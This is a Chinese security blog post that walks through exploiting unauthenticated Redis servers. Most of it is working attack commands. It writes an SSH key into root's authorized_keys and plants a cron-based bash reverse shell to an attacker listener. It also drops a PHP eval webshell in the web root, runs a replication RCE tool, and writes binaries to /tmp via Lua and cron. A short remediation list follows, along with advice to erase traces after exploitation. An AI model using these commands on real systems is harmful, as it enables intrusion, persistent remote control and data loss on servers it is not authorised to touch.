<!DOCTYPE html>


<html lang="ZH-CH" >


<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="safe" />
   
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    redis未授权访问复现以及利用 |  clancyb00m`s Blog
  </title>
  <meta name="generator" content="hexo-theme-yilia-plus">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

</head>

</html>

<body>
  <div id="app">
    <main class="content on">
      <section class="outer">
  <article id="post-redis未授权访问复现以及利用" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  redis未授权访问复现以及利用
</h1>
 

    </header>
    

    
    <div class="article-meta">
      <a href="/2020/07/15/redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%A4%8D%E7%8E%B0%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/" class="article-date">
  <time datetime="2020-07-15T08:10:10.000Z" itemprop="datePublished">2020-07-15</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.2k字</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">5分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      
      

      
      <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>Redis 因配置不当会未授权访问；如未设置登录密码，并将redis绑定到了 <code>0.0.0.0</code> 。攻击者无需认证访问到内部数据，可导致敏感信息泄露，也可以恶意执行 flushall 来清空所有数据。还可利用如下方式获取权限等</p>
<a id="more"></a>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><p>命令： <code>redis-cli -h 127.0.0.1 -p 6379</code> </p>
<p>通过以上命令登录目标服务器，尝试执行一些基础命令如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">info</span><br><span class="line"></span><br><span class="line">config get dir</span><br><span class="line"></span><br><span class="line">KEYS *</span><br><span class="line"></span><br><span class="line">config get dbfilename</span><br></pre></td></tr></table></figure>
<p>如果成功执行，则说明存在未授权访问漏洞，如下所示：</p>
<p><img src="/img/redis/01.png" alt=""></p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>在利用之前，先通过如下命令获取redis当前的目录和文件，在攻击后方便恢复</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">config get dir</span><br><span class="line"></span><br><span class="line">config get dbfilename</span><br></pre></td></tr></table></figure>

<h2 id="写-ssh-keygen-公钥登录服务器"><a href="#写-ssh-keygen-公钥登录服务器" class="headerlink" title="写 ssh-keygen 公钥登录服务器"></a>写 ssh-keygen 公钥登录服务器</h2><p>此方法所需条件：</p>
<ol>
<li>redis以root账号启动</li>
<li>服务器开放了ssh服务，并允许使用密钥登录</li>
</ol>
<p>先在本地生成公私钥，命令如下：</p>
<p><code>ssh-keygen -t rsa -C &quot;hack&quot;</code></p>
<p>一路默认即可</p>
<p>进入redis，执行以下命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;root&#x2F;.ssh&#x2F;</span><br><span class="line"></span><br><span class="line">config set dbfilename authorized_keys</span><br><span class="line"></span><br><span class="line">set x &quot;\n\n\n公钥内容\n\n\n&quot;</span><br><span class="line"></span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p><img src="/img/redis/sshkey01.png" alt=""></p>
<p>之后配置连接工具即可通过公钥登录服务器</p>
<p><img src="/img/redis/sshkey02.png" alt=""></p>
<h2 id="计划任务反弹shell"><a href="#计划任务反弹shell" class="headerlink" title="计划任务反弹shell"></a>计划任务反弹shell</h2><p>此方法所需条件：</p>
<ol>
<li>redis以root方式启动</li>
</ol>
<p>首先先在自己的服务器上开启监听：<br>假设为 <code>192.168.1.1</code></p>
<p><code>nc -lnvp 5678</code></p>
<p>之后在redis中执行如下命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;var&#x2F;spool&#x2F;cron&#x2F;</span><br><span class="line"></span><br><span class="line">config set dbfilename root</span><br><span class="line"></span><br><span class="line">set x &quot;\n* * * * * bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.1.1&#x2F;5678 0&gt;&amp;1\n&quot;</span><br><span class="line"></span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p><img src="/img/redis/cron01.png" alt=""></p>
<p>稍等片刻，即可拿到shell</p>
<p><img src="/img/redis/cron02.png" alt=""></p>
<h2 id="利用redis写webshell"><a href="#利用redis写webshell" class="headerlink" title="利用redis写webshell"></a>利用redis写webshell</h2><p>此方法所需条件：</p>
<ol>
<li>服务器开启web服务</li>
<li>redis 有 web 目录写权限</li>
</ol>
<p>执行如下命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">设置目录为web根目录</span><br><span class="line">config set dir &#x2F;var&#x2F;www&#x2F;html&#x2F;</span><br><span class="line"></span><br><span class="line">自定义文件名</span><br><span class="line">config set dbfilename hack.php</span><br><span class="line"></span><br><span class="line">自定义shell内容</span><br><span class="line">set x &quot;&lt;?php @eval($_POST[&#39;clancy&#39;]);?&gt;&quot;</span><br><span class="line"></span><br><span class="line">save</span><br></pre></td></tr></table></figure>
<p><img src="/img/redis/webshell03.png" alt=""></p>
<p>访问写入的文件，如图所示：</p>
<p><img src="/img/redis/webshell01.png" alt=""></p>
<p>执行一条命令：</p>
<p><img src="/img/redis/webshell02.png" alt=""></p>
<h2 id="主从复制获取shell"><a href="#主从复制获取shell" class="headerlink" title="主从复制获取shell"></a>主从复制获取shell</h2><p>利用脚本：<a href="https://github.com/Ridter/redis-rce" target="_blank" rel="noopener">https://github.com/Ridter/redis-rce</a></p>
<p>执行以下命令：</p>
<p><code>python3 redis_rce.py -r 127.0.0.1 -L 127.0.0.1 -f exp.so -a 被攻击redis的登录密码</code> </p>
<p><img src="/img/redis/zcfz01.png" alt=""></p>
<p><img src="/img/redis/zcfz02.png" alt=""></p>
<p>如果选择 <code>r</code> ，即反弹shell</p>
<p><img src="/img/redis/zcfz03.png" alt=""></p>
<p><img src="/img/redis/zcfz04.png" alt=""></p>
<h2 id="执行lua脚本"><a href="#执行lua脚本" class="headerlink" title="执行lua脚本"></a>执行lua脚本</h2><p>搞不懂意义何在</p>
<h2 id="写二进制文件，利用dns、icmp等协议上线（tcp协议不能出网）"><a href="#写二进制文件，利用dns、icmp等协议上线（tcp协议不能出网）" class="headerlink" title="写二进制文件，利用dns、icmp等协议上线（tcp协议不能出网）"></a>写二进制文件，利用dns、icmp等协议上线（tcp协议不能出网）</h2><blockquote>
<p>不太清楚写入二进制文件之后的操作</p>
</blockquote>
<p>本地创建<code>a.lua</code>，内容如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">local function hex2bin(hexstr)</span><br><span class="line">    local str &#x3D; &quot;&quot;</span><br><span class="line">    for i &#x3D; 1, string.len(hexstr) - 1, 2 do</span><br><span class="line">        local doublebytestr &#x3D; string.sub(hexstr, i, i+1);</span><br><span class="line">        local n &#x3D; tonumber(doublebytestr, 16);</span><br><span class="line">        if 0 &#x3D;&#x3D; n then</span><br><span class="line">            str &#x3D; str .. &#39;\00&#39;</span><br><span class="line">        else</span><br><span class="line">            str &#x3D; str .. string.format(&quot;%c&quot;, n)</span><br><span class="line">        end</span><br><span class="line">    end</span><br><span class="line">    return str</span><br><span class="line">end</span><br><span class="line"></span><br><span class="line">local dir &#x3D; redis.call(&#39;config&#39;,&#39;get&#39;,&#39;dir&#39;)</span><br><span class="line">redis.call(&#39;config&#39;,&#39;set&#39;,&#39;dir&#39;,&#39;&#x2F;tmp&#x2F;&#39;)</span><br><span class="line">local dbfilename &#x3D; redis.call(&#39;config&#39;,&#39;get&#39;,&#39;dbfilename&#39;)</span><br><span class="line">redis.call(&#39;config&#39;,&#39;set&#39;,&#39;dbfilename&#39;,&#39;t&#39;)</span><br><span class="line">local rdbcompress &#x3D; redis.call(&#39;config&#39;,&#39;get&#39;,&#39;rdbcompression&#39;)</span><br><span class="line">redis.call(&#39;config&#39;,&#39;set&#39;,&#39;rdbcompression&#39;,&#39;no&#39;)</span><br><span class="line">redis.call(&#39;flushall&#39;)</span><br><span class="line"></span><br><span class="line">local data &#x3D; &#39;1a2b3c4d5e6f1223344556677890aa&#39;</span><br><span class="line">redis.call(&#39;set&#39;,&#39;data&#39;,hex2bin(&#39;0a7c7c7c&#39;..data..&#39;7c7c7c0a&#39;))</span><br><span class="line">local rst &#x3D; &#123;&#125;</span><br><span class="line">rst[1] &#x3D; &#39;server default config&#39;</span><br><span class="line">rst[2] &#x3D; &#39;dir:&#39;..dir[2]</span><br><span class="line">rst[3] &#x3D; &#39;dbfilename:&#39;..dbfilename[2]</span><br><span class="line">rst[4] &#x3D; &#39;rdbcompression:&#39;..rdbcompress[2]</span><br><span class="line">return rst</span><br></pre></td></tr></table></figure>
<p>本地执行 <code>redis-cli --eval a.lua -h 被攻击服务器IP</code></p>
<p><img src="/img/redis/bin01.png" alt=""></p>
<p>之后进入被攻击服务器，执行save命令进行保存</p>
<p>由于写入的文件前后是存在垃圾数据的，下一步通过写计划任务调用python或者系统命令提取出二进制文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;var&#x2F;spool&#x2F;cron&#x2F;crontabs&#x2F;</span><br><span class="line"></span><br><span class="line">config set dbfilename root</span><br><span class="line"></span><br><span class="line">set x &quot;\n*&#x2F;1 * * * * python -c &#39;open(\&quot;&#x2F;tmp&#x2F;rst\&quot;,\&quot;a+\&quot;).write(open(\&quot;&#x2F;tmp&#x2F;t\&quot;).read().split(\&quot;|||\&quot;)[1])&#39;\n&quot;</span><br><span class="line"></span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p><img src="/img/redis/bin02.png" alt=""></p>
<p>之后根据执行 <code>a.lua</code> 脚本时返回的内容复原redis</p>
<p><img src="/img/redis/bin03.png" alt=""></p>
<p>但是到这里应该没有结束，不清楚后续该怎么办了</p>
<h1 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h1><ol>
<li>禁止公网开放Redis端口,可以在防火墙上禁用6379 Redis的端口</li>
<li>配置 <code>redis.conf</code> 限制指定IP可访问，如需对外开放，可修改默认端口</li>
<li>设置登录密码，密码应设为高强度密码</li>
</ol>
<h1 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h1><p>在漏洞利用之后，一定要记得复原redis原来的配置，清除痕迹</p>
<h1 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h1><p><a href="https://www.freebuf.com/column/170710.html" target="_blank" rel="noopener">Redis漏洞利用与防御 author: Setup</a></p>
<p><a href="https://xz.aliyun.com/t/6103#toc-0" target="_blank" rel="noopener">常见未授权访问漏洞总结 author: 小维</a></p>
<p><a href="https://xz.aliyun.com/t/2320#toc-2" target="_blank" rel="noopener">未授权访问的tips author: evi1ox</a></p>
<p><a href="https://paper.seebug.org/409/#0x02-redis" target="_blank" rel="noopener">未授权访问漏洞总结 author: w2n1ck@安全脉搏</a></p>
<p><a href="https://mp.weixin.qq.com/s/8qYVmhhJNCBMsASo4xGNfA" target="_blank" rel="noopener">redis未授权访问个⼈总结 author: 安全祖师爷</a></p>

      
      <!-- reward -->
      
      <div id="reward-btn">
        打赏
      </div>
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong s>
              本博客所有文章除特别声明外，均采用 <a href="https://www.apache.org/licenses/LICENSE-2.0.html" rel="external nofollow"
                target="_blank">Apache License 2.0</a> 许可协议。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://clancyb00m.github.io/2020/07/15/redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%A4%8D%E7%8E%B0%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/" rel="tag">未授权访问</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F/" rel="tag">端口渗透</a></li></ul>


    </footer>

  </div>

  
  
  <nav class="article-nav">
    
    
      <a href="/2020/07/15/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">未授权访问漏洞总结</div>
      </a>
    
  </nav>


  

  

  
  
  

</article>
</section>
      <footer class="footer">
  <div class="outer">
    <ul class="list-inline">
      <li>
        &copy;
        2018-2020
        clancyb00m
      </li>
      <li>
        
        Powered by
        
        
        <a href="https://hexo.io" target="_blank">Hexo</a> Theme <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul class="list-inline">
      <li>
        
        
        <span>
  <i>PV:<span id="busuanzi_value_page_pv"></span></i>
  <i>UV:<span id="busuanzi_value_site_uv"></span></i>
</span>
        
      </li>
      
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="clancyb00m`s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/null">旅行</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/null">摄影</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/null">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>起飞~起飞~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script>
  try {
    var typed = new Typed("#subtitle", {
      strings: ['歪比歪比，歪比巴卜', '', ''],
      startDelay: 0,
      typeSpeed: 200,
      loop: true,
      backSpeed: 100,
      showCursor: true
    });
  } catch (err) {
  }

</script>




<script src="/js/tocbot.min.js"></script>

<script>
  // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>



<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>




<script src="/js/busuanzi-2.3.pure.min.js"></script>



<script type="text/javascript" src="https://js.users.51.la/20544303.js"></script>

    
  </div>
</body>

</html>